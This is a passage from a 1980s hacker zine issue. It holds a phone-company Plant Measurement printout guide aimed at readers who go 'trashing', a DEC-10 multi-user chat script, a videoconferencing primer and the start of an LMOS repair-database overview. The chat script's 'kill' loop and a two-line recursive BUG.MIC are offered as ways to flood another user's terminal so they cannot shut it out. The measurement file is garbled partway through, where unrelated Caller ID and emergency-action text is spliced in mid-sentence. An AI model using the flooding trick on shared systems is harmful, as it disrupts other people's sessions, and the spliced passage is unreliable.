  924. 215  ABI/INFORM
  925. 216  PTS Prompt
  926. 229  Drug Information
  927. 231  CHEMNAME
  928. 247  Magazine Index
  929. 250  CAB Abstracts
  930. 254  Medline
  931. 290  Dialindex
  932. 296  TrademarkScan
  933.  
  934.  
  935.  
  936. Summary of command Abbreviations
  937.  
  938. B=BEGIN  E=EXPAND  S=SELECT SS=SELECT STEP
  939. T=TYPE   D=DISPLAY PR=PRINT P=PAGE
  940.  
  941. Dialog Training office  1-800-227-8282 or 1-800-982-5838
  942.  
  943.  
  944. Have Fun..
  945.  
  946.                     <----Ctrl C---->
  947.                            ATI!
  948. =========================================================================
  949. Received: (from LISTSERV@PSUVM for TK0EEE1@UCLAMAIL via NJE)
  950.          (LISTSE00-8268;     328 LINES); Wed, 20 Dec 89 09:57:41 CST
  951. Date:    Wed, 20 Dec 89 09:57 CST
  952. To:      TK0EEE1
  953. From:    LISTSERV@PSUVM
  954.  
  955.  
  956.                                ==Phrack Inc.==
  957.  
  958.                     Volume One, Issue Nine, Phile #6 of 10
  959.  
  960. [<+>]->->->->->->->->->->PLP<-<-<-<-<-<-<-<-<-<-[<+>]
  961.  |-|                     ---                     |-|
  962.  |P| S         [+] The Executioner [+]         L |P|
  963.  |h| t       [+]-PhoneLine Phantoms!-[+]       i |h|
  964.  |a| a       |-|-===================-|-|       n |a|
  965.  |n| l       |S|-|    -Present-    |-|S|       k |n|
  966.  |t| a       |e|-===================-|e|       o |t|
  967.  |o| g       |x|-|Plant Measurement|-|x|       L |o|
  968.  |m|         |y|-===================-|y|       a |m|
  969.  |s| 1       |-|-| Thanks to AT&T. |-|-|       n |s|
  970.  |-| 3       [+]-===================-[+]       d |-|
  971.  |P|                                             |P|
  972.  |L|  [+] Carrier Culprit    [+] Egyptian Lover  |L|
  973.  |P|  [+] The Executioner    [+] Solid State     |P|
  974.  |-|  [+] Black Majik        [+] Mr. Icom        |-|
  975.  |$|  -----------------------------------------  |$|
  976. [<+>]->->->->->->->->->->PLP<-<-<-<-<-<-<-<-<-<-[<+>]
  977.  
  978. Preface
  979. =======
  980.  
  981.      This first part in a series of three deals with how your CO measures its
  982. efficiency and hardware performance. I don't know how far I will go in this
  983. first segment so whatever I don't finish will be completed in parts two and
  984. three.
  985.  
  986. Introduction
  987. ============
  988.  
  989.      Have you ever gone trashing and the only thing you found was a large
  990. printout that looked like it was written in Chinese? Did you curse yourself
  991. because you spent 30 minutes digging through someone's lunch and digestive
  992. rejectables and the only thing that was readable was a large spool that
  993. contained such acronyms as TRUNK and CAMA and LATA linked by foreign letters
  994. that you never thought could be conjugated? Well, in this 3 part series, I
  995. hope to show you that that large printout with coffee stains isn't all
  996. useless.
  997.  
  998. Types of Measurements
  999. =====================
  1000.  
  1001.      Now, the way your CO determines how well it is serving you is by the
  1002. Plant Measurement. The purpose of these measurements is to provide maintenance
  1003. personnel with a quantitative summary of the condition of the hardware and its
  1004. impact on customer service.
  1005.  This data is printed out at the system terminal and is used to alert
  1006. personnel about problems before they occur.
  1007.  
  1008.      Plant Measurement data is printed on the maintenance terminal via the
  1009. following output messages:
  1010.  
  1011.      1. PM01 - The PM01 is a daily printout which is printed daily at 2:30 am.
  1012.  
  1013.      2. PM02 - The PM02 is a monthly summary printed immediately after the
  1014.                daily PM01 printout only on the 23rd of each month.
  1015.  
  1016.      3. PM05 - The PM03 is a daily printout which is printed after the PM01 or
  1017.                PM02 (on the 23rd). The PM05 is utilized in offices equipped
  1018.                with the AUTOPLEX System 100 (Advanced Mobile Telephone
  1019.                Service).
  1020.  
  1021.      4. PM03 - This is a daily or monthly printout which is available upon
  1022.                manual request.
  1023.  
  1024. ------------------------------------------------------------
  1025.  
  1026. The counts provided by the plant measurement are basically 3 types:
  1027.  
  1028.      1. Customer Service Measurements
  1029.      2. Hardware Performance Measurements
  1030.      3. Base Measurements
  1031.  
  1032.  
  1033.      Customer service measurements are a measure of the service received by
  1034. the customer as influenced by the condition of the system's hardware. These
  1035. include the number of calls to billings that are offered to the system but are
  1036. delayed or lost because of marginal or faulty equipment.
  1037.  
  1038.      Hardware Measurements are an indication of the condition of the system
  1039. hardware which is described in terms of the number of errors, trouble
  1040. indications, and out of service intervals. These measurements may not reflect
  1041. customers directly, but do indicate how well the system is functioning.
  1042.  
  1043.      Base Measurements that are provided are counts of the total calls carried
  1044. by the system broken into various categories. These counts are necessary to
  1045. normalize service counts and performance counts of mechanical units if
  1046. comparisons are to be made of offices with dissimilar traffic characteristics.
  1047.  
  1048.  
  1049. Daily PM01 Output Message
  1050. =========================
  1051.  
  1052.      The daily Plant Measurement data in the PM01 output message is organized
  1053. as follows:
  1054.  
  1055.      o Base Measurements
  1056.      o Selected Customer Service Measurements
  1057.      o Maintenance Measurements including emergency action
  1058.        (EA), maintenance interrupts, and network failures
  1059.      o Performance measurements of system hardware including
  1060.        the central processor and bus system
  1061.      o Coded enable peripheral units, peripheral units, and
  1062.        trunk and service circuits.
  1063.      o Time-Out totals
  1064.      o Attached processor measurements
  1065.      o Circuit Switch Digital Capability measurements
  1066.      o Improved Public Telephone Service measurements
  1067.      o Remote Switch System measurements
  1068.  
  1069. ===================
  1070. =Base Measurements=
  1071. ===================
  1072.  
  1073.      The base measurements provided by the PPMP1A00 are needed to normalize
  1074. the service counts and performance counts of units whose uses vary with the
  1075. traffic load. By using these counts, meaningful comparisons can be made with
  1076. past performance and with the performance of offices with dissimilar traffic
  1077. characteristics. The counts are taken in terms of carried load (excluding all
  1078. traffic overflow).
  1079.  
  1080. The BASE MEASUREMENTS are as follows, with the printout in parenthesis:
  1081.  
  1082. 1. Originate Calls (ORIG CALLS): Counts the number customer receiver seizures
  1083.    for which at least 1 digit is received. The count includes partial dials
  1084.    (but not permanent signals) as well as additional partied added to a
  1085.    conference circuit. The PPMP1A00 obtains this from the traffic measurements
  1086.    program.
  1087.  
  1088. 2. Incoming Calls (INC CALLS): Counts the number of calls originating from
  1089.    trunks incoming from distant locations that seize an incoming register (and
  1090.    in the case of a by-link, receive one digit). The PPMP1A00 obtains this
  1091.    count directly from the traffic measurements program.
  1092.  
  1093. 3. Outgoing Calls (OUTG CALLS): Counts the number of calls for which
  1094.    outpulsing is required and a transmitter is successfully seized.
  1095.  
  1096. 4. Coin Control Seizures (COIN CONTR SEIZ): Counts the number of times the
  1097.    coin control circuit is successfully connected to a coin line. This count
  1098.    will exceed coin line originations as the coin control circuit may be
  1099.    seized more than once during a call.
  1100.  
  1101. 5. CAMA Seizures (CAMA SEIZ): Counts then number of times an incoming CAMA
  1102.    trunk (operator or ANI) is seized.
  1103.  
  1104. 6. AMA Entries (AMA ENTRIES): Counts the number of billing entries put on AMA
  1105.    tape.
  1106.  
  1107. 7. Automatic ID. Outward Dialing Seizures (AIOD SEIZ): Counts the number of
  1108.    successful connections to an AIOD receiver.
  1109.  
  1110. 8. Centrex Data Link Seizures (CTX DL SEIZ): Counts the number of connections
  1111.    to a centrex DL for transmission or reception of lamp and key orders. This
  1112.    is NOT a count of centrex calls.
  1113.  
  1114. 9. Output Message Register (OMR SEIZ): Counts the number of seizure output
  1115.    message registers.
  1116.  
  1117. ======================
  1118. =Service Measurements=
  1119. ======================
  1120.  
  1121.      The service measurements give valid indications of the level of customer
  1122. service. A count of the calls lost by the system, as a result of hardware
  1123. malfunctions, is a significant measure of the influence of the condition of
  1124. the central office hardware on customer service. The following service
  1125. measurements are provided.
  1126.  
  1127. 1. Hardware Lost Calls (HWR LOST CALLS): Counts the number of calls dropped
  1128.    when a trunk is suspected and is placed on the trunk maintenance list (TML)
  1129.    for diagnosis or when a network failure has occurred on the call.
  1130.  
  1131. 2. Hardware Lost Billing (HWR LOST BILLING): Counts the number of calls not
  1132.    billed because both AMAs are out of service (local, long distance, and
  1133.    special service calls are allowed to proceed without billing).
  1134.  
  1135. 3. Coin Control Failures (COIN CONTR FAILURES): Counts the number of stuck
  1136.    coin conditions and coin telephones served by the office which had coin
  1137.    relays that were out of limits.
  1138.  
  1139. 4. Automatic Identification Outward Dialing Special Billing Number Billing
  1140.    (AIOD SBN BILLING): Counts the number of times the AIOD equipment fails to
  1141.    bill a local PBX number correctly.
  1142.  
  1143. 5. Dial Tone Speed Test (DTST): Counts the number of times the customer has to
  1144.    wait an excessive amount of time for the system to process the call because
  1145.    trunks in the desired trunk group are busy or the system is overloaded,
  1146.    causing queuing for equipment.  The count includes 3-second and 11-second
  1147.    delays.
  1148.  
  1149.      NOTE:
  1150.           Maintenance personnel may find it necessary
  1151.           to suspend the running of the DTST because in
  1152.           certain trouble conditions DTST may generate
  1153.           traffic that would interfere with maintenance
  1154.           activities. Extended or frequent use of this
  1155.           feature is not recommended. To discourage the
  1156.           unnecessary use of this function, the PM01 output
  1157.           message will include a one-line message alerting
  1158.           maintenance personnel to it's use.
  1159.  
  1160. 6. CAMA Lost Billing (CAMA LOST BILLING): Counts the number of times a CAMA
  1161.    call is handled but due to hardware failure, no AMA register is available
  1162.    which is necessary for billing.
  1163.  
  1164. 7. CAMA ANI Failures (CAMA ANI FAILURES): Counts the number of calls for which
  1165.    ANI failure digit is received.
  1166.  
  1167. 8. Receiver Attachment Delay (RCVR ATT DELAY): Counts the number of times a
  1168.    receiver connection was not made in 4 seconds.
  1169.  
  1170. 9. Receiver Attachment Delay Recorder (RADR Inhibit Usage): Counts tR described.
  1171.  
  1172. This is rather simple when you think about it and is one example of how a once
  1173. shattered network is working together.
  1174.  
  1175. Some Sample CP ID Uses
  1176. ----------------------
  1177. This can be used by large telephone ordering companies to instantly display a
  1178. record of that persons credit, previous orders, etc... before the call is even
  1179. answered on the attendant's terminal.
  1180.  
  1181. When someone logs onto a computer, the originating # is listed on the user log
  1182. along with the account name, etc... so that if---------
  1183.  
  1184. The software EA phases may be initiated by the following sources:
  1185.  
  1186. 1. A failure by the system to answer an interrupt request
  1187. 2. An E-to-E cycle becoming excessive
  1188. 3. An E-to-E priority class frequency failure
  1189. 4. An excessive rate of interrupts
  1190. 5. Two successive data validation failures
  1191. 6. The time spent in a phase becoming excessive
  1192. 7. Aborting of a phase
  1193.  
  1194. The number of EA phases is printed on the PM01 output message.
  1195.  
  1196. Interrupts
  1197. ----------
  1198.  
  1199. The number of various maintenance interrupts provides a picture of nonroutine
  1200. maintenance action taken by the system. These interrupts are generally not as
  1201. serious as a higher order EA phase, but they do interrupt normal call
  1202. processing to correct possible hardware problems. A counts of these interrupts
  1203. will give a good indication of the state of the systems' equipment. This is
  1204. printed on the PM01 output message.
  1205.  
  1206. Network Failures
  1207. ----------------
  1208.  
  1209. The network failure counts are provided to give an indication of how well the
  1210. network is completing and terminating calls. Each time a network failure
  1211. occurs in the system an 'NT' output message is printed. The following are
  1212. printed as part of the PM01 message:
  1213.  
  1214. 1. Supervisory Scan failure (SUPF)
  1215. 2. False cross and ground test failure (FCGF)
  1216. 3. Ringing Current Failure (RC)
  1217. 4. Low-line resistance failure (LLR)
  1218. 5. Power Cross test (PX)
  1219. 6. Restore verify failure count (RVFY)
  1220. 7. Showering line test failure (SHWL)
  1221. 8. Call Cutoff Failure (CO)
  1222.  
  1223. ================================
  1224. =An Example of the PM01 Message=
  1225. ================================
  1226.  
  1227. PM01
  1228. 201-232 PLANT MEASUREMENTS SUMMARY
  1229. TUES
  1230. 10/17/86
  1231.  
  1232.           SERVICE AFFECTING DATA
  1233.  
  1234.           BASE MEASUREMENTS
  1235.  
  1236. 2           ORIG CALLS
  1237. 1           INC CALLS
  1238. 0           OUTG CALLS
  1239. 0           COIN CONTR FAILURES
  1240. 0           OMR SEIZ
  1241. 34          CAMA SEIZ
  1242. 0           AMA ENTRIES
  1243. 0           AIOD SEIZ
  1244. 0           CTX D-L SEIZ
  1245.  
  1246.           SERVICE MEASUREMENTS
  1247.  
  1248. 0           HWR LOST CALLS
  1249. 0           HWR LOST BILLING
  1250. 0           COIN CONTR FAILURES
  1251. 0           AIOD-SBN BILLING
  1252. 0           DTST DELAYS
  1253. 0           CAMA LOST BILLING
  1254. 0           CAMA ANI FAILURE
  1255. 0           RCVR ATT DELAYS
  1256. 0           RADR INHIBIT USE
  1257. 2           FALSE STARTS
  1258.  
  1259. [Note 201-232 is the area code-office code]
  1260.  
  1261. ============================================================
  1262. =         (C) Copyright Sexy-Exy and PLP 1986              =
  1263. ============================================================
  1264.  
  1265.                                ==Phrack Inc.==
  1266.  
  1267.                     Volume One, Issue Nine, Phile #7 of 10
  1268.  
  1269. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  1270.                                 (512)-396-1120
  1271.                             The Shack // presents
  1272.                     A Multi-User Chat Program for DEC-10s
  1273.                              Original Program by
  1274.                                    TTY-Man
  1275.                           Modified and Clarified by
  1276.                                +++The Mentor+++
  1277.                               October 6th, 1986
  1278.  
  1279. Intro:  Unlike its more sophisticated older brother, the VAX, the DEC has no
  1280. easy-to-use communication system like the VMS PHONE utility.  The following
  1281. program makes use of the MIC file type available on most DECs.  Each user that
  1282. wishes to be involved in the conference needs to run the program from his area
  1283. using the .DO COM command.  The program can be entered with any editor (I
  1284. recommend SED if you have VT52 emulation), and should be saved as COM.MIC. The
  1285. program does not assume any specific terminal type or emulation.  You will
  1286. have to know the TTY number of any person you wish to add to the conference,
  1287. but this is available through a .SYSTAT command or .R WHO (see below.)
  1288. SYSTAT
  1289. This is an example of a SYSTAT to used to determine TTY#...
  1290. Status of Saturn 7.03.2 at  7:27:51 on 03-Oct-86
  1291. Uptime 40:41:14, 77% Null time = 77% Idle + 0% Lost, 9% Overhead
  1292. 27 Jobs in use out of 128.  27 logged in (LOGMAX of 127), 16 detached.
  1293.        PPN#    TTY#      CURR     SIZE
  1294. 19    [OPR]       6      OPR      56+39     HB              18
  1295. 20     7,20       5      OPR      23+39     HB              24 $
  1296. 21  2501,1007    56      COMPIL   8+8       ^C            1:34 $
  1297. 22    66,1012    57      TECO     10+12     TI              39
  1298. 23    66,1011    62      1022     16+55     TI              36 $
  1299. 24    [SELF]     64      SYSTAT   23+SPY    RN               0 $
  1300. 26    [OPR]      DET     STOMPR   10+9      SL               2
  1301. 27 16011,1003    DET     DIRECT   17+32     ^C              30 $
  1302. 36    [OPR]      DET     FILDAE   17        HB            1:57
  1303.  
  1304.         The TTY# is available in the TTY column... DET means that the user is
  1305. detached and is unavailable for chatting...
  1306.         Below is an example of .R WHO to obtain the same information...
  1307.  
  1308. /- jobs in use out of 127.
  1309. Job   Who        Line      PPN
  1310. 20  OPERATOR 20     5      7,20
  1311. 21  DISPONDENT     56   2501,1007
  1312. 22  ADP-TBO        57     66,1012
  1313. 23  ADP-MDL        62     66,1011
  1314. 24  THE MENTOR     64   XXXX,XXX
  1315. 27  GEO4440103    Det  16011,1003
  1316.  
  1317.  
  1318.         In each case, I am on TTY# 64...
  1319.  
  1320.         Anyway, use the following program, it's more convenient that doing a
  1321. .SEN <tty> every time you want to send a message.   Also, to shut out an
  1322. annoying sender, use .SET TTY GAG.  To remove, .SET TTY NO GAG... pretty
  1323. simple, huh?
  1324.  
  1325.  
  1326. start::
  1327. !
  1328. !Now in loop: 'a 'b 'c 'd 'e 'f
  1329. !
  1330. .mic input A,"Destination Terminal 1:"
  1331. .if ($a="") .goto welcome
  1332. .mic input B,"Destination Terminal 2:"
  1333. .if ($b="") .goto welcome
  1334. .mic input C,"Destination Terminal 3:"
  1335. .if ($c="") .goto welcome
  1336. .mic input D,"Destination Terminal 4:"
  1337. .if ($d="") .goto welcome
  1338. .mic input E,"Destination Terminal 5:"
  1339. .if ($e="") .goto welcome
  1340. .mic input F,"Destination Terminal 6:"
  1341. .if ($f="") .goto welcome
  1342. welcome::
  1343. !Sending Hello Message...
  1344. sen 'a Conference Forming on TTYs 'b 'c 'd 'e 'f ... DO COM to these to join'
  1345. sen 'b Conference Forming on TTYs 'a 'c 'd 'e 'f ... DO COM to these to join'
  1346. sen 'c Conference Forming on TTYs 'a 'b 'd 'e 'f ... DO COM to these to join'
  1347. sen 'd Conference Forming on TTYs 'a 'b 'c 'e 'f ... DO COM to these to join'
  1348. sen 'e Conference Forming on TTYs 'a 'b 'c 'd 'f ... DO COM to these to join'
  1349. sen 'f Conference Forming on TTYs 'a 'b 'c 'd 'e ... DO COM to these to join'
  1350. !
  1351. !Type /h for help
  1352. com::
  1353. .mic input G,"T>"
  1354. !Checking Commands.. Wait..
  1355. .if ($g="/h") .goto help
  1356. .if ($g="/k") .goto kill
  1357. .if ($g="/l") .goto list
  1358. .if ($g="/d") .goto drop
  1359. .if ($g="/t") .goto time
  1360. .if ($g="/w") .goto who
  1361. .if ($g="/u") .goto users
  1362. .if ($g="/q") .goto quit
  1363. .if ($g="/r") .backto start
  1364. .if ($g="/ac") .goto ack
  1365. !Transmitting..  Wait..
  1366. sen 'a 'g
  1367. sen 'b 'g
  1368. sen 'c 'g
  1369. sen 'd 'g
  1370. sen 'e 'g
  1371. sen 'f 'g
  1372. .backto com
  1373. help::
  1374. !
  1375. !        Internal Commands
  1376. !
  1377. ! /H  -> This Menu       /K -> Kill
  1378. ! /L  -> List Terminals  /U -> Users
  1379. ! /W  -> R who           /AC-> Alert Caller
  1380. ! /Q  -> Quit
  1381. ! /R  -> Restart/Add
  1382. ! /T  -> Show Date/Time
  1383. ! /D  -> Drop Caller
  1384. !
  1385. ! All Commands must be in lower case.
  1386. !
  1387. .backto com
  1388. list::
  1389. !
  1390. !Currently Connected To Terminals: 'a 'b 'c 'd 'e 'f
  1391. !
  1392. .backto com
  1393. who::
  1394. .revive
  1395. .r who
  1396. '<silence>
  1397. .backto com
  1398. users::
  1399. .revive
  1400. .r users
  1401. '<silence>
  1402. .BACKTO COM
  1403. QUIT::
  1404. !
  1405. !Call The Shack... 512-396-1120 300/1200 24 hours
  1406. !
  1407. .mic cancel
  1408. drop::
  1409. !
  1410. !Send Hangup Message:: Enter Terminal Number To Be Disconnected.
  1411. !
  1412. .mic input h,"Destination Terminal Number:"
  1413. .sen 'h  <=- Communication Terminated at '<time> -=>
  1414. .backto start
  1415. ack::
  1416. .mic input h,"Destination Terminal Number:"
  1417. .sen 'h %TMRR -  Timeout Error, Response Required, Please ACKNOWLEDGE!
  1418. .backto com
  1419. kill::
  1420. !
  1421. !Send Message To Specific Terminal In A Loop
  1422. .mic input n,"Are You Sure (Y/N)?"
  1423. .if ($n="y") then .goto k1
  1424. !%Function Aborted - Returning To Communication Mode.
  1425. .backto com
  1426. k1::
  1427. .mic input h,"Destination Terminal Number:"
  1428. .mic input n,"K>"
  1429. dog::
  1430. !Transmitting...CTRL-C Aborts!
  1431. .sen 'h'n
  1432. .backto dog
  1433. time::
  1434. !
  1435. !Current Date : '<date>
  1436. !Current Time : '<time>
  1437. !
  1438. .backto com
  1439.  
  1440.  
  1441.         Wasn't that neat?  A feature that you can implement separately to be a
  1442. pain in the ass is the recursive MIC that sends an annoying message to a
  1443. specified terminal.  It is almost impossible for them to shut you out without
  1444. logging out unless they are already gagged.
  1445.         Just create a small MIC file called BUG.MIC... to do it in two lines,
  1446. simply type...
  1447.  .SEN <tty # goes here> Eat hot photons, Vogon slime!
  1448.  .DO BUG
  1449.  
  1450.         That's it!  I hope this comes in useful to someone out there!  Give us
  1451. a call at The Shack... 512-396-1120  300/1200 baud, 24 hours a day... And a
  1452. special welcome to all the feds who will doubtlessly be calling since the
  1453. number appears in here... we have nothing to hide!
  1454.                                         +++The Mentor+++
  1455. Received: (from LISTSERV@PSUVM for TK0EEE1@UCLAMAIL via NJE)
  1456.          (LISTSE00-8374;     202 LINES); Wed, 20 Dec 89 10:01:52 CST
  1457. Date:    Wed, 20 Dec 89 10:01 CST
  1458. To:      TK0EEE1
  1459. From:    LISTSERV@PSUVM
  1460.  
  1461.                                ==Phrack Inc.==
  1462.  
  1463.                     Volume One, Issue Nine, Phile #8 of 10
  1464.  
  1465. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1466.  
  1467.                      "Introduction to Videoconferencing"
  1468.  
  1469.                              by Knight Lightning
  1470.  
  1471.                               Written On 10/3/86
  1472.  
  1473. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1474. Hi, KL here welcoming you to a look at Videoconferencing.   This is a
  1475. relatively new field that definitely bears investigation as videoconferencing
  1476. is only a step away from everyone having video communication in the home. Well
  1477. enough is enough, I hope you enjoy the file --KL.
  1478. ______________________________________________________________________________
  1479.  
  1480. Despite the growing use of videoconferencing, confusion still exists regarding
  1481. what it can and cannot do.  This file should begin to help answer some of the
  1482. questions about videoconferencing and perhaps formulate new ideas as well.
  1483. Videoconferencing is not just one thing.  It takes several different forms and
  1484. can be designed in many different ways.  Most of these ways are probably still
  1485. waiting to be discovered.
  1486.  
  1487. First of all, there are two main categories of videoconferencing.  There is
  1488. Point-to-Point and Point-to-Multipoint.
  1489.  
  1490.  
  1491. Point-to-point/Two-Way Videoconferencing
  1492. ----------------------------------------
  1493. Two-way videoconferencing enables people to conduct meetings even though the
  1494. participants are in separate locations.  Using interactive video and audio
  1495. equipment, participants in one location can see, hear, and interact with
  1496. colleagues in another location.
  1497.  
  1498. The most familiar example occurs regularly on TV.  When a newscaster in
  1499. Washington interviews a head of state on the opposite side of the world
  1500. "live," that's point-to-point, full-motion, full-color videoconferencing.
  1501.  
  1502.  
  1503. Point-to-multipoint/One-Way Videoconferencing
  1504. ---------------------------------------------
  1505. The one-way videoconference allows an organization to present video
  1506. information to large audiences in multiple locations at the same time.
  1507.  
  1508. One-way videoconferences are very different from two-way videoconferences in
  1509. purpose and in implementation.  Two-way videoconferences allow small groups in
  1510. two, or possibly several, locations to interact audio-visually.  In contrast,
  1511. one-way videoconferences are designed to provide a one-way audio-visual
  1512. presentation of information from an originating site to audiences at numerous
  1513. receiving locations.
  1514.  
  1515. The remote "audiences" are not seen by the initiators of the presentation.
  1516. However, since both types of videoconferencing take place in real time, live,
  1517. the audience can participate over the phone.
  1518.  
  1519.  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1520.  
  1521. There are two variations on the above listed categories of videoconferencing;
  1522. Full-motion videoconferencing and freeze-frame videoconferencing.  Each
  1523. carries its own set of system requirements and each accomplishes quite
  1524. different tasks.
  1525.  
  1526.  
  1527.                         FULL-MOTION Videoconferencing
  1528.                         -----------------------------
  1529. Full-motion videoconferencing is like watching television.  You can see
  1530. participants in another location in color and in "real time" motion.  You can
  1531. identify who is present (provided that they are within camera range) and who
  1532. is speaking.  You can see facial expressions, hand gestures, and general body
  1533. language.  Motion video is used primarily for images of people.
  1534.  
  1535.  
  1536. Motion Transmission On Wideband Channels
  1537. ----------------------------------------
  1538. There is far more information in moving pictures then in a still image.
  1539. Consequently, the size of the communications channel required to transmit and
  1540. receive motion is far greater than that required for a still image.
  1541.  
  1542. Transmission of a television signal in its original analog form (as it would
  1543. come from a TV camera), requires terrestrial television channels or a
  1544. satellite transponder.  Terrestrial television channels are not readily
  1545. available for occasional corporate use; satellite transponders are available.
  1546.  
  1547. Most systems therefore, incorporate digital compression techniques to reduce
  1548. the bandwidth required for motion videoconferences.  Example:  An image in
  1549. motion is refreshed on a television screen 30 times per second.  This means
  1550. that the bandwidth necessary to transmit the image is very high, usually 1.5
  1551. megabits per second (Mbps).
  1552.  
  1553. This bandwidth is beyond the capacity of the standard telephone cable.  A
  1554. device called a "codec" digitizes the analog television signal and compresses
  1555. it by eliminating redundant information.  Currently, codecs can reduce the
  1556. bandwidth to 56 kilobits per second (Kbps) and it is hoped that this bandwidth
  1557. can be compressed even further.
  1558.  
  1559. The resulting signal can be transmitted over less than full bandwidth
  1560. channels. The picture is of somewhat less quality than the original analog
  1561. image, but more than sufficient for most meetings.
  1562.  
  1563.  
  1564.                         FREEZE-FRAME Videoconferencing
  1565.                         ------------------------------
  1566. Freeze-frame videoconferencing is like a slide show.  It captures still images
  1567. either in color or black-and-white.  Freeze-frame "stills" of people seem
  1568. unnatural and can be distracting.  Yet, freeze-frame video is best for still
  1569. images of three-dimensional objects such as a product or a part, and for
  1570. charts, drawings, graphics, and specially prepared presentation material.
  1571.  
  1572.  
  1573. Freeze-Frame Transmission On Narrow Band Channels
  1574. -------------------------------------------------
  1575. A freeze-frame system captures an image by stopping, or freezing any motion
  1576. that might be present.  The image can be transmitted via analog or digital
  1577. signals over narrow channels.  These channels are considerably narrower than
  1578. those used for full-motion video conferencing.  In its simplest form,
  1579. freeze-frame video can utilize ordinary telephone line transmission.  A single
  1580. freeze-frame image will require at least 30 seconds to a minute or more for
  1581. transmission.
  1582.  
  1583. In some systems, the freeze-frame image is displayed line by line as it is
  1584. received.  This creates a vertical "waterfall" effect or a horizontal scanning
  1585. effect.  In other systems, the incoming lines of picture information are
  1586. stored in a buffer until the completed picture can be displayed as a whole.
  1587. In still other systems, an image emerges in successively better resolution as
  1588. additional picture information is received.
  1589.  
  1590.  
  1591. Enhancements To Freeze-Frame Video Systems
  1592. ------------------------------------------
  1593. There are a number of ways to expand a freeze-frame video system's
  1594. capabilities.  One enhancement is telewriting.  With a "pen" connected to a
  1595. telewriting device, users can point out a portion of a freeze-frame video
  1596. image, overlaying lines and markings in various colors that are displayed at
  1597. all locations as they are drawn.  Some telewriting devices include stored
  1598. geometric shapes, logos, and symbols that can be transmitted as overlays to a
  1599. freeze-frame image.  Zoom capability enables close-up analysis of portions of
  1600. a display.
  1601.  
  1602.  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1603.  
  1604.                Personal Computers and Desktop Videoconferencing
  1605.                ------------------------------------------------
  1606. Personal computers are beginning to be increasingly used with freeze-frame
  1607. videoconferencing.   PCs are used for control, for the creation of graphics,
  1608. and for storage and retrieval of graphics material.  There are signs that this
  1609. evolution towards desktop videoconferencing has already begun.
  1610.  
  1611. The MINX (Multimedia Information Network Exchange) work station, recently
  1612. announced by Datapoint Corporation, combines a camera and speakerphone with a
  1613. high-resolution-color video graphics display screen.
  1614.  
  1615. The MINX can be configured with Datapoint's Vista-PC or with the IBM PC, AT,
  1616. or XT, in which case the PC monitor is replaced by the MINX.  A mode key on
  1617. the workstation permits the user to shift between the video communications
  1618. mode and the normal PC mode.
  1619.  
  1620. Another indication of this revolution is provided by Northern Telecom
  1621. (creators of DMS-100, 200, & 250), which recently added Meeting Communications
  1622. Services (MCS) to its Meridian DV-1 voice/data system.  This option allows up
  1623. to 24 participants to conduct simultaneous audio communication and up to eight
  1624. participants to view, modify, and exchange data using Meridian M4000
  1625. integrated terminals.
  1626.  
  1627. A third and final example is the Luma phone from Luma Telecom.  This device,
  1628. which uses regular phone lines, combines audio with black-and-white
  1629. freeze-frame video on a three-inch-diagonal screen.  Strictly a telephone
  1630. product, the Luma phone has no computer features and will not transmit data.
  1631. For more information on the Luma phone, please see the November, 1986 issue of
  1632. The Sharper Image catalog.
  1633.  
  1634.  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1635.  
  1636. Videoconferencing is the way of the future and its only drawback is that of
  1637. economic cost.   Increased use of videoconferencing will depend a lot on the
  1638. adoption of the Integrated Services Digital Network (ISDN), a standard,
  1639. all-digital communications service promised by the regional Bell Operating
  1640. Companies (BOCs).
  1641.  
  1642. ISDN will offer users 144 Kbs or more which can be allocated among various
  1643. communications tasks--data, voice, or video--in whatever proportion is
  1644. necessary.  This means that the available bandwidth could support simultaneous
  1645. audio and video communication.
  1646. ______________________________________________________________________________
  1647.  
  1648. References:
  1649. ----------
  1650. "Electronic Meetings:  Substitutes With Substance?," by Sam Dickey, Today's
  1651.  Office, July 1986.
  1652.  
  1653. "Getting The Full Picture On Corporate Videoconferencing," by Marita Thomas,
  1654.  Facilities Design & Management, June 1986.
  1655.  
  1656. "The Lid Is Off ISDN," Tomorrow's Communication Connection, April 1986.
  1657.  
  1658. "Videoconferencing;  An Alternative Solution," Corporate Informations Systems,
  1659. General Electric (GE).
  1660. ______________________________________________________________________________
  1661. Onto the next generation... --KL
  1662. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1663.  
  1664.                                ==Phrack Inc.==
  1665.  
  1666.                     Volume One, Issue Nine, Phile #9 of 10
  1667.  
  1668.                       Loop Maintenance Operations System
  1669.  
  1670.                  Written by Phantom Phreaker and Doom Prophet
  1671.  
  1672.                        Part I: A basic overview of LMOS
  1673.  
  1674.                        Part II:Mechanized Loop Testing
  1675.  
  1676.  
  1677.  
  1678.  
  1679.      Loop Maintenance and Operations System (LMOS) is a telephone company
  1680. database that is a vital part in the act of repairing local loops (a customers
  1681. telephone line). When you call the Repair Service to have your telephone
  1682. service repaired, the information you give, as well as information and history
  1683. on your local loop is processed through the LMOS database. This file shall
  1684. examine several of the parts of LMOS, which is used by a number of different
  1685. bureaus. The bureau that you reach when you dial your repair service is called
  1686. the Centralized Repair Service Answering Bureau (CRSAB), and is usually
  1687. reached by dialing (1)+611 or sometimes a POTS (Plain Old Telephone Service)
  1688. number in areas where the X11 services aren't available. A CRSAB attendant is
  1689. who you will deal with when reporting line trouble. You will tell the
  1690. attendant the line number, and the types of problems you are experiencing on
  1691. that line. The attendant will file a report concerning the basic information
  1692. vital to line repair. Something called 'Front End Processors' form a
  1693. 'real-time' interface between the customer reporting the trouble, and the
  1694. CRSAB attendant. 'Real-Time ' means that it is done on a continually changing
  1695. basis, (ex. while the customer is reporting the trouble to an attendant,
  1696. action is being taken.)
  1697.  
  1698.      When a customer makes a trouble report to the CRSAB, the report is filed
  1699. and sent through the Cross Front End, which is a link from the CRSAB to the
